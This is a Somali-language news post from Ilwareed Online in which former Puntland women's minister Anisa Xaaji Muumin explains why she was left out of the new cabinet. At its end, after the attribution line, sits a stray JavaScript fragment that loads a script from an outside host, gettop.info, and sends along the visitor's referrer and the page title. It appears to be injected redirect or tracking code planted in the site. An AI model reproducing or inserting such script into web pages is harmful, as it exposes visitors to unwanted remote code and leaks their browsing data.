Wasiirkii Hore Ee Haweenka Puntland oo Sheegtay Sababta Looga Reebay Wasiirada Cusub Ee Puntland *Daawo*

Ilwareed Online

Anisa Xaaji Muumin oo aheyd Wasiirkii hore ee Wasaaradda Haweenka Puntland ayaa daaha ka qaaday arimo xasaasiya  oo ay kamid yihiin sababta Madaxweyne Gaas uga reebay Golaha Wasiirada cusub iyo Xildhibaano ay sheegtay iney ka daba shaqeeyeen si aysan uga mid noqon Golaha cusub.

Anisa Xaaji muumin ayaa shacabka Puntland usoo jeedisay iney kala doortaan dhowr arimood oo masiirkooda u daneynaya iyo arimo mustaqbalkooda mugdi galinaya.

Mogadishu – Somalia

Wixii warbixin ah waxaad noogu soo diri kartaa email: ilwareednet@gmail.com
fadlan like saar boggeena facebook : @ilwareedonline

The post Wasiirkii Hore Ee Haweenka Puntland oo Sheegtay Sababta Looga Reebay Wasiirada Cusub Ee Puntland *Daawo* appeared first on Ilwareed Online.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

You might also like More from author